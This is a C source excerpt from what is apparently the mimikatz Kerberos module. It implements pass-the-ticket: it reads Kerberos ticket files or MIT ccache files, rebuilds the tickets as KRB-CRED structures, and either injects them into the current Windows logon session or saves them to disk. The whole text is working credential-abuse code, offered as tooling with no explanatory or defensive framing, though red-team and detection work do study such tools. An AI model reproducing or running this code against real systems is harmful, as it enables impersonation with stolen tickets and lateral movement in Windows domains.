void kuhl_m_kerberos_ptt_file(PCWCHAR filename)
{
PBYTE fileData;
DWORD fileSize;
NTSTATUS status;
if(kull_m_file_readData(filename, &fileData, &fileSize))
{
status = kuhl_m_kerberos_ptt_data(fileData, fileSize);
if(NT_SUCCESS(status))
kprintf(L"OK\n");
else
PRINT_ERROR(L"LsaCallKerberosPackage %08x\n", status);
LocalFree(fileData);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData");
}
NTSTATUS kuhl_m_kerberos_ptt(int argc, wchar_t * argv[])
{
PBYTE fileData;
DWORD fileSize;
if(argc)
{
if(kull_m_file_readData(argv[argc - 1], &fileData, &fileSize))
{
if(NT_SUCCESS(kuhl_m_kerberos_ptt_data(fileData, fileSize)))
kprintf(L"Ticket \'%s\' successfully submitted for current session\n", argv[0]);
LocalFree(fileData);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData");
} else PRINT_ERROR(L"Missing argument : ticket filename\n");
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_kerberos_ccache_enum(int argc, wchar_t * argv[], BOOL isInject, BOOL isSave)
{
PBYTE file, data;
DWORD length, i;
USHORT version;
PKERB_EXTERNAL_NAME principalName; UNICODE_STRING principalRealm;
PKIWI_KERBEROS_TICKET ticket;
PDIRTY_ASN1_SEQUENCE_EASY App_KrbCred;
DWORD App_KrbCred_Size;
wchar_t * saveFilename;
if(argc)
{
if(kull_m_file_readData(argv[0], &file, &length))
{
data = file;
version = _byteswap_ushort(*(PUSHORT) data); data += sizeof(USHORT);
if(version == 0x0504)
{
data += sizeof(USHORT) + _byteswap_ushort(*(PUSHORT) data);
kuhl_m_kerberos_ccache_externalname(&data, &principalName, &principalRealm);
if(principalName)
{
kuhl_m_kerberos_ticket_displayExternalName(L"\nPrincipal : ", principalName, &principalRealm);
for(i = 0; data < (file + length); i++)
{
kprintf(L"\n\nData %u", i);
if(ticket = (PKIWI_KERBEROS_TICKET) LocalAlloc(LPTR, sizeof(KIWI_KERBEROS_TICKET)))
{
kuhl_m_kerberos_ccache_externalname(&data, &ticket->ClientName, &ticket->AltTargetDomainName);
kuhl_m_kerberos_ccache_externalname(&data, &ticket->ServiceName, &ticket->DomainName);
ticket->TargetName = kuhl_m_kerberos_ticket_copyExternalName(ticket->ServiceName);
kull_m_string_copyUnicodeStringBuffer(&ticket->DomainName, &ticket->TargetDomainName);
ticket->KeyType = _byteswap_ushort(*(PUSHORT) data); data += sizeof(USHORT);
ticket->TicketEncType = _byteswap_ushort(*(PUSHORT) data); data += sizeof(USHORT);
ticket->Key.Length = _byteswap_ushort(*(PUSHORT) data); data += sizeof(USHORT);
if(ticket->Key.Length)
if(ticket->Key.Value = (PUCHAR) LocalAlloc(LPTR, ticket->Key.Length))
RtlCopyMemory(ticket->Key.Value, data, ticket->Key.Length);
data += ticket->Key.Length + sizeof(DWORD); // authtime;
kuhl_m_kerberos_ccache_UnixTimeToFileTime(_byteswap_ulong(*(PDWORD) data), &ticket->StartTime); data += sizeof(DWORD); // local ?
kuhl_m_kerberos_ccache_UnixTimeToFileTime(_byteswap_ulong(*(PDWORD) data), &ticket->EndTime); data += sizeof(DWORD);
kuhl_m_kerberos_ccache_UnixTimeToFileTime(_byteswap_ulong(*(PDWORD) data), &ticket->RenewUntil); data += sizeof(DWORD) + sizeof(UCHAR); // skey
ticket->TicketFlags = _byteswap_ulong(*(PDWORD) data); data += sizeof(DWORD);
kuhl_m_kerberos_ccache_skip_struct_with_buffer(&data); // address
kuhl_m_kerberos_ccache_skip_struct_with_buffer(&data); // authdata
ticket->Ticket.Length = _byteswap_ulong(*(PDWORD) data); data += sizeof(DWORD);
ticket->TicketKvno = 2;
if(ticket->Ticket.Length)
if(ticket->Ticket.Value = (PUCHAR) LocalAlloc(LPTR, ticket->Ticket.Length))
RtlCopyMemory(ticket->Ticket.Value, data, ticket->Ticket.Length);
data += ticket->Ticket.Length;
kuhl_m_kerberos_ccache_skip_buffer(&data);
if(!RtlEqualUnicodeString(&usXCACHECONF, &ticket->TargetDomainName, TRUE))
{
kuhl_m_kerberos_ticket_display(ticket, FALSE);
if(isSave || isInject)
{
if(App_KrbCred = kuhl_m_kerberos_ticket_createAppKrbCred(ticket, TRUE))
{
App_KrbCred_Size = kull_m_asn1_getSize(App_KrbCred);
if(isInject)
{
kprintf(L"\n\t * Injecting ticket : ");
if(NT_SUCCESS(kuhl_m_kerberos_ptt_data(App_KrbCred, App_KrbCred_Size)))
kprintf(L"OK\n");
}
else
{
if(saveFilename = kuhl_m_kerberos_ccache_generateFileName(i, ticket, MIMIKATZ_KERBEROS_EXT))
{
if(kull_m_file_writeData(saveFilename, App_KrbCred, App_KrbCred_Size))
kprintf(L"\n\t * Saved to file %s !", saveFilename);
else PRINT_ERROR_AUTO(L"kull_m_file_writeData");
LocalFree(saveFilename);
}
}
LocalFree(App_KrbCred);
}
}
}
else kprintf(L"\n\t* %wZ entry? *", &usXCACHECONF);
kuhl_m_kerberos_ticket_freeTicket(ticket);
}
}
kuhl_m_kerberos_ticket_freeExternalName(principalName);
}
}
else PRINT_ERROR(L"ccache version != 0x0504\n");
LocalFree(file);
}
else PRINT_ERROR_AUTO(L"kull_m_file_readData");
}
else PRINT_ERROR(L"At least one filename is needed\n");
return STATUS_SUCCESS;
}